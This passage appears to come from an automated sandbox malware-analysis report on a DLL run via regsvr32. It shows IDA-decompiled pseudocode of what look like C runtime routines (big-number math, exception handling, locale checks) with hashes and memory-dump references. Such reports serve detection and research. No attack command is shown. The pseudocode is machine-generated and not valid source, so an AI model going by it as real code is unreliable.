                                                                                                    0x18003bcbb
                                                                                                    0x18003bcc9
                                                                                                    0x18003bcd3
                                                                                                    0x18003bcdb
                                                                                                    0x18003bce0
                                                                                                    0x18003bce7
                                                                                                    0x18003bcec
                                                                                                    0x18003bcf1
                                                                                                    0x18003bcf4
                                                                                                    0x18003bcf7
                                                                                                    0x18003bcfa
                                                                                                    0x18003bd15
                                                                                                    0x18003bd18
                                                                                                    0x18003bd1c
                                                                                                    0x18003bd22
                                                                                                    0x18003bd27
                                                                                                    0x18003bd2a
                                                                                                    0x18003bd30
                                                                                                    0x18003bd35
                                                                                                    0x18003bd3b
                                                                                                    0x18003bd3f
                                                                                                    0x18003bd45
                                                                                                    0x18003bd4b
                                                                                                    0x18003bd70

                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.374193232.0000000180001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                    • Associated: 0000000E.00000002.374175797.0000000180000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374302852.000000018004A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374332530.000000018005D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374346154.0000000180060000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_14_2_180000000_regsvr32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memset$memcpy_s$_invalid_parameter_noinfo
                                                                                                    • String ID: s
                                                                                                    • API String ID: 189074420-453955339
                                                                                                    • Opcode ID: 2d3ddf81ef39efe358627ccc344041bb19e966fc413ae75c58326705f52a9a2b
                                                                                                    • Instruction ID: 62ef02a5f5c3b8fe7d8d9ab154af619ab133e5b591181e50e1037319d02e588d
                                                                                                    • Opcode Fuzzy Hash: 2d3ddf81ef39efe358627ccc344041bb19e966fc413ae75c58326705f52a9a2b
                                                                                                    • Instruction Fuzzy Hash: E6A204722142888BE7B7CE29D5507EB77A5F3887CCF519115EB0697A89DB38DB08CB40
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0000000180048480 Relevance: 30.0, APIs: 16, Strings: 1, Instructions: 258COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.374193232.0000000180001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                    • Associated: 0000000E.00000002.374175797.0000000180000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374302852.000000018004A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374332530.000000018005D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374346154.0000000180060000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_14_2_180000000_regsvr32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: GestureInfo$CloseHandleInvalidateRect
                                                                                                    • String ID: 8
                                                                                                    • API String ID: 3962864237-4194326291
                                                                                                    • Opcode ID: 0433488dfe1a867193185e9703e287ca0324726f8b0e02b53d17384e02c8e5eb
                                                                                                    • Instruction ID: 425d3576d6cb615d33a92bd1f94bf0a0a0d7d4a1e3cd5dac7b99a1d9c3971a3a
                                                                                                    • Opcode Fuzzy Hash: 0433488dfe1a867193185e9703e287ca0324726f8b0e02b53d17384e02c8e5eb
                                                                                                    • Instruction Fuzzy Hash: ECC18132604E848AE357CB39D1407ADB3A5FB597C8F15C712BA46A3A10EF35D5A6CB04
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 000000018003C950 Relevance: 16.9, APIs: 11, Instructions: 392COMMONCrypto
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 81%
                                                                                                    			E0000000118003C950(signed int __edx, long long __rbx, signed int __rcx, void* __r11) {
				void* __rsi;
				unsigned int _t118;
				void* _t125;
				void* _t131;
				void* _t134;
				signed int _t144;
				void* _t145;
				void* _t151;
				signed int _t163;
				signed int _t166;
				signed int _t167;
				signed int _t168;
				signed int _t181;
				intOrPtr _t195;
				signed int _t203;
				signed long long _t244;
				signed long long _t245;
				signed long long _t249;
				signed long long _t256;
				signed long long _t260;
				long long _t273;
				void* _t274;
				void* _t278;
				signed long long _t279;
				int _t281;
				int _t284;
				void* _t285;
				void* _t287;
				signed long long _t288;
				signed long long _t296;
				signed long long _t300;
				signed long long _t306;
				void* _t308;
				signed long long _t314;
				signed long long _t315;
				void* _t316;
				int _t321;
				long long _t322;
				int _t324;
				void* _t327;

				 *((long long*)(_t287 + 0x18)) = __rbx;
				_t285 = _t287 - 0x2f0;
				_t288 = _t287 - 0x3f0;
				_t244 =  *0x8005d010; // 0xb03f6156e10
				_t245 = _t244 ^ _t288;
				 *(_t285 + 0x2e0) = _t245;
				 *(_t288 + 0x28) = __edx;
				r8d = __edx;
				r9d = 0;
				_t118 = 0xcccccccd * __edx >> 0x20 >> 3;
				 *(_t288 + 0x2c) = _t118;
				r15d = _t118;
				 *(_t288 + 0x20) = _t118;
				if (_t118 == 0) goto 0x8003cdf9;
				r13d = r15d;
				r13d =  >  ? 0x26 : r13d;
				 *(_t288 + 0x24) = r13d;
				_t279 = 0x512f0 + _t245 * 4;
				 *(_t288 + 0x40) = _t281 + __rcx;
				memset(_t327, _t324, _t321);
				E0000000118000EEF0( *(_t279 + 0x180000000) & 0x0000ffff, _t288 + 0x44 + __rcx * 4, 0x509e0 + _t245 * 4 + 0x180000000, _t281 << 2);
				_t166 =  *(_t288 + 0x40);
				if (_t166 - 1 > 0) goto 0x8003cad7;
				_t125 =  *(_t288 + 0x44);
				if (_t125 != 0) goto 0x8003ca49;
				 *__rcx = 0;
				goto 0x8003cdd0;
				if (_t125 == 1) goto 0x8003cdd0;
				r10d =  *__rcx;
				if (r10d == 0) goto 0x8003cdd0;
				_t314 = __rcx + 4;
				r8d = 0;
				r9d = 0;
				r9d = r9d + 1;
				if (r9d != r10d) goto 0x8003ca70;
				if (r8d == 0) goto 0x8003cdd0;
				if ( *__rcx - 0x73 >= 0) goto 0x8003cab4;
				 *(__rcx + 4 + _t245 * 4) = r8d;
				 *__rcx =  *__rcx + 1;
				goto 0x8003cdd0;
				r9d = 0;
				 *(_t288 + 0x40) = 0;
				 *__rcx = 0;
				_t256 = _t314;
				E0000000118003E44C(0x1cc, _t245, _t245, _t256, (0x509e0 + _t245 * 4 + 0x180000000) * _t245 + _t245, _t281 << 2, _t288 + 0x44, _t308, _t314, _t316);
				goto 0x8003cdd2;
				if ( *__rcx - 1 > 0) goto 0x8003cbf6;
				_t195 =  *((intOrPtr*)(__rcx + 4));
				_t249 = __rcx + 4;
				 *__rcx = _t166;
				_t296 = _t256 << 2;
				if (_t296 == 0) goto 0x8003cb41;
				if (_t249 != 0) goto 0x8003cb0c;
				_t131 = E0000000118002E69C(_t245);
				 *_t245 = 0x16;
				goto 0x8003cb3c;
				if (_t296 - 0x1cc > 0) goto 0x8003cb24;
				E0000000118000EEF0(_t131, _t249, _t288 + 0x44, _t296);
				goto 0x8003cb41;
				r8d = 0x1cc;
				memset(_t278, _t281, _t284);
				_t134 = E0000000118002E69C(_t245);
				 *_t245 = 0x22;
				E0000000118002E4F0(_t134);
				if (_t195 != 0) goto 0x8003cb68;
				r9d = 0;
				 *(_t288 + 0x40) = 0;
				 *__rcx = 0;
				E0000000118003E44C(0x1cc, _t245, _t249, _t249, _t288 + 0x44, _t281 << 2, _t288 + 0x44, _t308, _t314);
				goto 0x8003cdd0;
				if (_t195 == 1) goto 0x8003cdd0;
				r10d =  *__rcx;
				if (r10d == 0) goto 0x8003cdd0;
				_t315 = _t279;
				r8d = 0;
				r9d = 0;
				r9d = r9d + 1;
				if (r9d != r10d) goto 0x8003cb90;
				if (r8d == 0) goto 0x8003cdd0;
				if ( *__rcx - 0x73 >= 0) goto 0x8003cbd3;
				 *(__rcx + 4 + _t245 * 4) = r8d;
				 *__rcx =  *__rcx + 1;
				goto 0x8003cdd0;
				r9d = 0;
				 *(_t288 + 0x40) = 0;
				_t300 = _t288 + 0x44;
				 *__rcx = 0;
				_t260 = _t249;
				E0000000118003E44C(0x1cc, _t245, _t249, _t260, (_t288 + 0x44) * _t315 + _t245, _t281 << 2, _t300, _t308, _t315);
				goto 0x8003cdd2;
				_t322 = __rcx + 4;
				if (0 == 0) goto 0x8003cc10;
				r12d = _t166;
				goto 0x8003cc1d;
				r12d = 0;
				_t203 = _t166;
				_t273 = _t322;
				r9d = 0;
				 *((long long*)(_t288 + 0x30)) = _t273;
				_t167 = r9d;
				_t163 = r9d;
				 *(_t285 + 0x110) = _t167;
				if (r12d == 0) goto 0x8003cd4f;
				asm("o16 nop [eax+eax]");
				if ( *((intOrPtr*)(_t273 + _t245 * 4)) != 0) goto 0x8003cc67;
				if (_t163 != _t167) goto 0x8003cd44;
				_t63 = _t249 + 1; // 0x1
				_t168 = _t63;
				 *(_t285 + 0x114 + _t245 * 4) = r9d;
				 *(_t285 + 0x110) = _t168;
				goto 0x8003cd44;
				r10d = r9d;
				_t144 = _t163;
				if (_t203 == 0) goto 0x8003cd3a;
				r11d = _t163;
				r11d =  ~r11d;
				asm("o16 nop [eax+eax]");
				if (_t144 == 0x73) goto 0x8003cce4;
				if (_t144 != _t168) goto 0x8003cca2;
				_t68 = _t249 + 1; // 0x1
				 *(_t285 + 0x114 + _t260 * 4) = r9d;
				 *(_t285 + 0x110) = _t68 + _t315 + _t245;
				_t145 = _t144 + 1;
				r8d =  *(_t288 + 0x44 + _t260 * 4);
				 *(_t285 + 0x114 + _t260 * 4) = r8d;
				r9d = 0;
				if (_t315 + _t245 != _t203) goto 0x8003cc80;
				if (r10d == 0) goto 0x8003cd3a;
				if (_t145 == 0x73) goto 0x8003cd70;
				if (_t145 !=  *(_t285 + 0x110)) goto 0x8003cd0c;
				 *(_t285 + 0x114 + _t260 * 4) = r9d;
				_t85 = _t245 + 1; // 0x1
				 *(_t285 + 0x110) = _t85;
				_t274 = _t285 + 0x114;
				r8d =  *(_t274 + _t260 * 4);
				 *(_t274 + _t260 * 4) = r8d;
				_t181 =  *(_t285 + 0x110);
				r10d = r8d;
				if (r8d != 0) goto 0x8003ccf0;
				if (_t145 + 1 == 0x73) goto 0x8003cd70;
				if (_t163 + 1 != r12d) goto 0x8003cc40;
				r8d = _t181;
				_t306 = _t300 * _t279 + _t260 + _t260 + _t260 >> 0x20 << 2;
				 *__rcx = _t181;
				if (_t306 == 0) goto 0x8003cdbf;
				if (_t322 != 0) goto 0x8003cd88;
				E0000000118002E69C(_t245);
				 *_t245 = 0x16;
				goto 0x8003cdba;
				r15d =  *(_t288 + 0x20);
				r13d =  *(_t288 + 0x24);
				 *__rcx = r9d;
				goto 0x8003cdd5;
				if (_t306 - 0x1cc > 0) goto 0x8003cda2;
				E0000000118000EEF0(0, _t322, _t285 + 0x114, _t306);
				goto 0x8003cdbf;
				r8d = 0x1cc;
				memset(??, ??, ??);
				_t151 = E0000000118002E69C(_t245);
				 *_t245 = 0x22;
				E0000000118002E4F0(_t151);
				r15d =  *(_t288 + 0x20);
				r13d =  *(_t288 + 0x24);
				r9d = 0;
				if (1 == 0) goto 0x8003ce5d;
				r15d = r15d - r13d;
				 *(_t288 + 0x20) = r15d;
				if (1 != 0) goto 0x8003c9c0;
				r8d =  *(_t288 + 0x28);
				r8d = r8d - _t245 + _t245 * 4 + _t245 + _t245 * 4;
				if (1 == 0) goto 0x8003ce31;
				if ( *((intOrPtr*)(0x180000000 + 0x51388 + _t245 * 4)) != 0) goto 0x8003ce7f;
				 *(_t288 + 0x40) = r9d;
				 *__rcx = r9d;
				r9d = 0;
				E0000000118003E44C(0x1cc, _t245, _t249, __rcx + 4, _t285 + 0x114, _t281 << 2, _t288 + 0x44, _t285 + 0x114 + _t260 * 4, _t315);
				return E000000011800010E0(1, _t181,  *(_t285 + 0x2e0) ^ _t288);
			}











































                                                                                                    0x18003c950
                                                                                                    0x18003c960
                                                                                                    0x18003c968
                                                                                                    0x18003c96f
                                                                                                    0x18003c976
                                                                                                    0x18003c979
                                                                                                    0x18003c985
                                                                                                    0x18003c989
                                                                                                    0x18003c995
                                                                                                    0x18003c99d
                                                                                                    0x18003c9a0
                                                                                                    0x18003c9a4
                                                                                                    0x18003c9a7
                                                                                                    0x18003c9ad
                                                                                                    0x18003c9c4
                                                                                                    0x18003c9c7
                                                                                                    0x18003c9cd
                                                                                                    0x18003c9d6
                                                                                                    0x18003c9fd
                                                                                                    0x18003ca01
                                                                                                    0x18003ca25
                                                                                                    0x18003ca2a
                                                                                                    0x18003ca31
                                                                                                    0x18003ca37
                                                                                                    0x18003ca3d
                                                                                                    0x18003ca41
                                                                                                    0x18003ca44
                                                                                                    0x18003ca4c
                                                                                                    0x18003ca52
                                                                                                    0x18003ca58
                                                                                                    0x18003ca60
                                                                                                    0x18003ca64
                                                                                                    0x18003ca67
                                                                                                    0x18003ca73
                                                                                                    0x18003ca94
                                                                                                    0x18003ca99
                                                                                                    0x18003caa5
                                                                                                    0x18003caa7
                                                                                                    0x18003caac
                                                                                                    0x18003caaf
                                                                                                    0x18003cab4
                                                                                                    0x18003cab7
                                                                                                    0x18003cac0
                                                                                                    0x18003cac8
                                                                                                    0x18003cacb
                                                                                                    0x18003cad2
                                                                                                    0x18003cadd
                                                                                                    0x18003cae3
                                                                                                    0x18003cae7
                                                                                                    0x18003caee
                                                                                                    0x18003caf1
                                                                                                    0x18003caf8
                                                                                                    0x18003cafd
                                                                                                    0x18003caff
                                                                                                    0x18003cb04
                                                                                                    0x18003cb0a
                                                                                                    0x18003cb16
                                                                                                    0x18003cb1d
                                                                                                    0x18003cb22
                                                                                                    0x18003cb26
                                                                                                    0x18003cb2c
                                                                                                    0x18003cb31
                                                                                                    0x18003cb36
                                                                                                    0x18003cb3c
                                                                                                    0x18003cb43
                                                                                                    0x18003cb4c
                                                                                                    0x18003cb4f
                                                                                                    0x18003cb58
                                                                                                    0x18003cb5e
                                                                                                    0x18003cb63
                                                                                                    0x18003cb6b
                                                                                                    0x18003cb71
                                                                                                    0x18003cb77
                                                                                                    0x18003cb7f
                                                                                                    0x18003cb82
                                                                                                    0x18003cb85
                                                                                                    0x18003cb93
                                                                                                    0x18003cbb3
                                                                                                    0x18003cbb8
                                                                                                    0x18003cbc4
                                                                                                    0x18003cbc6
                                                                                                    0x18003cbcb
                                                                                                    0x18003cbce
                                                                                                    0x18003cbd3
                                                                                                    0x18003cbd6
                                                                                                    0x18003cbda
                                                                                                    0x18003cbdf
                                                                                                    0x18003cbe7
                                                                                                    0x18003cbea
                                                                                                    0x18003cbf1
                                                                                                    0x18003cbf8
                                                                                                    0x18003cc01
                                                                                                    0x18003cc0b
                                                                                                    0x18003cc0e
                                                                                                    0x18003cc10
                                                                                                    0x18003cc18
                                                                                                    0x18003cc1a
                                                                                                    0x18003cc1d
                                                                                                    0x18003cc20
                                                                                                    0x18003cc25
                                                                                                    0x18003cc28
                                                                                                    0x18003cc2b
                                                                                                    0x18003cc34
                                                                                                    0x18003cc3a
                                                                                                    0x18003cc47
                                                                                                    0x18003cc4b
                                                                                                    0x18003cc51
                                                                                                    0x18003cc51
                                                                                                    0x18003cc54
                                                                                                    0x18003cc5c
                                                                                                    0x18003cc62
                                                                                                    0x18003cc67
                                                                                                    0x18003cc6a
                                                                                                    0x18003cc6e
                                                                                                    0x18003cc74
                                                                                                    0x18003cc77
                                                                                                    0x18003cc7a
                                                                                                    0x18003cc83
                                                                                                    0x18003cc87
                                                                                                    0x18003cc8b
                                                                                                    0x18003cc8e
                                                                                                    0x18003cc9c
                                                                                                    0x18003ccb3
                                                                                                    0x18003ccb5
                                                                                                    0x18003cccd
                                                                                                    0x18003ccd7
                                                                                                    0x18003cce2
                                                                                                    0x18003cce7
                                                                                                    0x18003ccf3
                                                                                                    0x18003ccf7
                                                                                                    0x18003ccfb
                                                                                                    0x18003cd03
                                                                                                    0x18003cd06
                                                                                                    0x18003cd0e
                                                                                                    0x18003cd15
                                                                                                    0x18003cd25
                                                                                                    0x18003cd28
                                                                                                    0x18003cd32
                                                                                                    0x18003cd38
                                                                                                    0x18003cd3d
                                                                                                    0x18003cd49
                                                                                                    0x18003cd4f
                                                                                                    0x18003cd52
                                                                                                    0x18003cd56
                                                                                                    0x18003cd5c
                                                                                                    0x18003cd61
                                                                                                    0x18003cd63
                                                                                                    0x18003cd68
                                                                                                    0x18003cd6e
                                                                                                    0x18003cd70
                                                                                                    0x18003cd7c
                                                                                                    0x18003cd83
                                                                                                    0x18003cd86
                                                                                                    0x18003cd92
                                                                                                    0x18003cd9b
                                                                                                    0x18003cda0
                                                                                                    0x18003cda4
                                                                                                    0x18003cdaa
                                                                                                    0x18003cdaf
                                                                                                    0x18003cdb4
                                                                                                    0x18003cdba
                                                                                                    0x18003cdbf
                                                                                                    0x18003cdcb
                                                                                                    0x18003cdd2
                                                                                                    0x18003cdd7
                                                                                                    0x18003cddd
                                                                                                    0x18003cde5
                                                                                                    0x18003cdea
                                                                                                    0x18003cdf4
                                                                                                    0x18003cdfe
                                                                                                    0x18003ce01
                                                                                                    0x18003ce11
                                                                                                    0x18003ce13
                                                                                                    0x18003ce1c
                                                                                                    0x18003ce24
                                                                                                    0x18003ce2c
                                                                                                    0x18003ce5c

                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.374193232.0000000180001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                    • Associated: 0000000E.00000002.374175797.0000000180000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374302852.000000018004A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374332530.000000018005D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374346154.0000000180060000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_14_2_180000000_regsvr32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memcpy_s$_invalid_parameter_noinfomemset
                                                                                                    • String ID:
                                                                                                    • API String ID: 940076201-0
                                                                                                    • Opcode ID: cf49b5942b8f6f20fc946e0016409294d46d6661b783edfeefec2d5267a2ccfb
                                                                                                    • Instruction ID: fdd20b2148c0d1ad8294fc22f2affa3d14ca03d80025385d09f03d9f178208e4
                                                                                                    • Opcode Fuzzy Hash: cf49b5942b8f6f20fc946e0016409294d46d6661b783edfeefec2d5267a2ccfb
                                                                                                    • Instruction Fuzzy Hash: D1F1C57260029886E7A7CF15E404BEB77A4F79DBC4F569025FB0987785DB35CA08CB41
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 000000018002E2B0 Relevance: 12.1, APIs: 8, Instructions: 83COMMONLIBRARYCODE
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 17%
                                                                                                    			E0000000118002E2B0(void* __ecx, intOrPtr __edx, long long __rbx, long long __rsi) {
				void* _t36;
				int _t40;
				signed long long _t62;
				long long _t65;
				int _t84;
				int _t88;
				void* _t89;
				void* _t91;
				signed long long _t92;
				void* _t97;

				 *((long long*)(_t91 + 0x10)) = __rbx;
				 *((long long*)(_t91 + 0x18)) = __rsi;
				_t3 = _t91 - 0x4f0; // -1288
				_t89 = _t3;
				_t92 = _t91 - 0x5f0;
				_t62 =  *0x8005d010; // 0xb03f6156e10
				 *(_t89 + 0x4e0) = _t62 ^ _t92;
				if (__ecx == 0xffffffff) goto 0x8002e2ef;
				E00000001180001F18(_t36);
				r8d = 0x98;
				memset(_t97, _t84, _t88);
				r8d = 0x4d0;
				memset(??, ??, ??);
				_t7 = _t92 + 0x70; // 0x58
				 *((long long*)(_t92 + 0x48)) = _t7;
				_t10 = _t89 + 0x10; // -1272
				_t65 = _t10;
				 *((long long*)(_t92 + 0x50)) = _t65;
				__imp__RtlCaptureContext();
				r8d = 0;
				__imp__RtlLookupFunctionEntry();
				if (_t65 == 0) goto 0x8002e382;
				 *(_t92 + 0x38) =  *(_t92 + 0x38) & 0x00000000;
				_t16 = _t92 + 0x60; // 0x48
				 *((long long*)(_t92 + 0x30)) = _t16;
				_t19 = _t92 + 0x58; // 0x40
				 *((long long*)(_t92 + 0x28)) = _t19;
				_t21 = _t89 + 0x10; // -1272
				 *((long long*)(_t92 + 0x20)) = _t21;
				__imp__RtlVirtualUnwind();
				 *((long long*)(_t89 + 0x108)) =  *((intOrPtr*)(_t89 + 0x508));
				_t25 = _t89 + 0x508; // 0x0
				 *((intOrPtr*)(_t92 + 0x70)) = __edx;
				 *((long long*)(_t89 + 0xa8)) = _t25 + 8;
				 *((long long*)(_t89 - 0x80)) =  *((intOrPtr*)(_t89 + 0x508));
				 *((intOrPtr*)(_t92 + 0x74)) = r8d;
				_t40 = IsDebuggerPresent();
				SetUnhandledExceptionFilter(??);
				if (UnhandledExceptionFilter(??) != 0) goto 0x8002e3e4;
				if (_t40 != 0) goto 0x8002e3e4;
				if (__ecx == 0xffffffff) goto 0x8002e3e4;
				return E000000011800010E0(E00000001180001F18(_t42), __ecx,  *(_t89 + 0x4e0) ^ _t92);
			}













                                                                                                    0x18002e2b0
                                                                                                    0x18002e2b5
                                                                                                    0x18002e2be
                                                                                                    0x18002e2be
                                                                                                    0x18002e2c6
                                                                                                    0x18002e2cd
                                                                                                    0x18002e2d7
                                                                                                    0x18002e2e8
                                                                                                    0x18002e2ea
                                                                                                    0x18002e2f6
                                                                                                    0x18002e2fc
                                                                                                    0x18002e307
                                                                                                    0x18002e30d
                                                                                                    0x18002e312
                                                                                                    0x18002e317
                                                                                                    0x18002e320
                                                                                                    0x18002e320
                                                                                                    0x18002e324
                                                                                                    0x18002e329
                                                                                                    0x18002e33e
                                                                                                    0x18002e341
                                                                                                    0x18002e34a
                                                                                                    0x18002e34c
                                                                                                    0x18002e352
                                                                                                    0x18002e35f
                                                                                                    0x18002e367
                                                                                                    0x18002e36c
                                                                                                    0x18002e371
                                                                                                    0x18002e375
                                                                                                    0x18002e37c
                                                                                                    0x18002e389
                                                                                                    0x18002e390
                                                                                                    0x18002e39b
                                                                                                    0x18002e39f
                                                                                                    0x18002e3ad
                                                                                                    0x18002e3b1
                                                                                                    0x18002e3b5
                                                                                                    0x18002e3bf
                                                                                                    0x18002e3d2
                                                                                                    0x18002e3d6
                                                                                                    0x18002e3db
                                                                                                    0x18002e40a

                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.374193232.0000000180001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                    • Associated: 0000000E.00000002.374175797.0000000180000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374302852.000000018004A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374332530.000000018005D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374346154.0000000180060000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_14_2_180000000_regsvr32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ExceptionFilterUnhandledmemset$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                    • String ID:
                                                                                                    • API String ID: 3120524240-0
                                                                                                    • Opcode ID: edae83fdda6e1c232649ab0d1dd1867a7913cfd994693439a522a48fa3c29604
                                                                                                    • Instruction ID: 6dd2409d3e411e2abd120312893711d13557fa80e886fa10b738d783cbc86014
                                                                                                    • Opcode Fuzzy Hash: edae83fdda6e1c232649ab0d1dd1867a7913cfd994693439a522a48fa3c29604
                                                                                                    • Instruction Fuzzy Hash: 92313B32214F8486EBA1CF25E8843DE73A4F789799F544126FA9D43B99DF38C6498B00
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0000000180041210 Relevance: 10.7, APIs: 7, Instructions: 174COMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 54%
                                                                                                    			E00000001180041210(void* __ecx, void* __edx, long long __rcx, intOrPtr* __rdx, void* __r8, void* __r9) {
				signed int _v72;
				int _v80;
				int _v84;
				signed int _v88;
				void* __rbx;
				void* __rdi;
				void* __rsi;
				void* __rbp;
				int _t61;
				intOrPtr _t62;
				void* _t74;
				intOrPtr _t84;
				intOrPtr _t86;
				void* _t92;
				signed long long _t119;
				signed long long _t120;
				intOrPtr* _t121;
				intOrPtr* _t122;
				intOrPtr* _t123;
				intOrPtr* _t124;
				intOrPtr* _t125;
				signed long long _t127;
				void* _t128;
				intOrPtr* _t129;
				signed long long _t137;
				signed long long _t139;
				void* _t150;
				signed long long _t151;
				void* _t153;
				void* _t161;
				long long _t162;
				intOrPtr* _t164;

				_t161 = __r9;
				_t144 = __rdx;
				_t74 = __ecx;
				_t119 =  *0x8005d010; // 0xb03f6156e10
				_t120 = _t119 ^ _t153 - 0x00000040;
				_v72 = _t120;
				_t150 = __r8;
				_t164 = __rdx;
				_t162 = __rcx;
				E0000000118002C43C(_t120, _t128);
				_t151 = _t120;
				_v88 = _t120;
				_v80 = 0;
				E0000000118002C43C(_t120, _t128);
				r12d = 0;
				_t5 = _t151 + 0xa0; // 0xa0
				_t129 = _t5;
				 *((long long*)(_t120 + 0x3a0)) =  &_v88;
				_t121 = _t162 + 0x80;
				 *((long long*)(_t151 + 0x98)) = _t162;
				 *_t129 = _t121;
				if (_t121 == 0) goto 0x80041297;
				if ( *_t121 == r12w) goto 0x80041297;
				_t84 =  *0x80051960; // 0x17
				E00000001180041184(_t84 - 1, _t129, 0x800517f0, __r8, _t151, _t153, _t129);
				_v88 = r12d;
				_t122 =  *((intOrPtr*)(_t151 + 0x98));
				if (_t122 == 0) goto 0x80041320;
				if ( *_t122 == r12w) goto 0x80041320;
				_t123 =  *_t129;
				if (_t123 == 0) goto 0x800412c6;
				if ( *_t123 == r12w) goto 0x800412c6;
				E00000001180040AE0(_t74, _t84 - 1, _t123, _t129,  &_v88, _t144, _t129);
				goto 0x800412cf;
				E00000001180040BB0(_t74, _t84 - 1, _t123, _t129,  &_v88, _t144, _t129);
				if (_v88 != r12d) goto 0x80041396;
				_t86 =  *0x800517e0; // 0x41
				_t14 = _t151 + 0x98; // 0x98
				if (E00000001180041184(_t86 - 1, _t129, 0x800513d0, __r8, _t151, _t153, _t14) == 0) goto 0x8004138c;
				_t124 =  *_t129;
				if (_t124 == 0) goto 0x80041315;
				if ( *_t124 == r12w) goto 0x80041315;
				E00000001180040AE0(_t74, _t86 - 1, _t124, _t129,  &_v88, _t144, _t14);
				goto 0x8004138c;
				_t137 =  &_v88;
				E00000001180040BB0(_t74, _t86 - 1, _t124, _t129, _t137, _t144, _t14);
				goto 0x8004138c;
				_t125 =  *_t129;
				if (_t125 == 0) goto 0x80041379;
				if ( *_t125 == r12w) goto 0x80041379;
				E0000000118002C43C(_t125, _t129);
				_t139 = (_t137 | 0xffffffff) + 1;
				if ( *((intOrPtr*)( *((intOrPtr*)(_t125 + 0xa0)) + _t139 * 2)) != r12w) goto 0x80041341;
				 *(_t125 + 0xb4) = r12d & 0xffffff00 | _t139 == 0x00000003;
				EnumSystemLocalesW(??, ??);
				if ((_v88 & 0x00000004) != 0) goto 0x8004138c;
				_v88 = r12d;
				goto 0x8004138c;
				_v88 = 0x104;
				_t61 = GetUserDefaultLCID();
				_v80 = _t61;
				_v84 = _t61;
				if (_v88 == r12d) goto 0x80041480;
				_t127 = _t162 + 0x100;
				asm("dec eax");
				_t62 = E00000001180041000(_t129, 0x180040970 & _t127,  &_v88, _t151);
				if (_t62 == 0) goto 0x80041480;
				_t34 = _t127 - 0xfde8; // -65000
				if (_t34 - 1 <= 0) goto 0x80041480;
				if (IsValidCodePage(??) == 0) goto 0x80041480;
				if (IsValidLocale(??, ??) == 0) goto 0x80041480;
				if (_t164 == 0) goto 0x800413f7;
				 *_t164 = _t62;
				_t37 = _t151 + 0x2f0; // 0x2f0
				r9d = 0;
				_t38 = _t161 + 0x55; // 0x55
				_t92 = _t38;
				r8d = _t92;
				E0000000118002DA04(_v84, _t164, _t129, 0x180040970 & _t127, _t37, _t150, _t151, _t153);
				if (_t150 == 0) goto 0x80041479;
				r9d = 0;
				r8d = _t92;
				E0000000118002DA04(_v84, _t150, _t129, 0x180040970 & _t127, _t150 + 0x120, _t150, _t151, _t153);
				r9d = 0x40;
				if (GetLocaleInfoW(??, ??, ??, ??) == 0) goto 0x80041480;
				r9d = 0x40;
				if (GetLocaleInfoW(??, ??, ??, ??) == 0) goto 0x80041480;
				_t45 = _t151 - 0x36; // 0xa
				r9d = _t45;
				_t46 = _t151 - 0x30; // 0x10
				r8d = _t46;
				E00000001180044018(_t62);
				goto 0x80041482;
				return E000000011800010E0(0, _t62, _v72 ^ _t153 - 0x00000040);
			}



































                                                                                                    0x180041210
                                                                                                    0x180041210
                                                                                                    0x180041210
                                                                                                    0x180041222
                                                                                                    0x180041229
                                                                                                    0x18004122c
                                                                                                    0x180041230
                                                                                                    0x180041233
                                                                                                    0x180041236
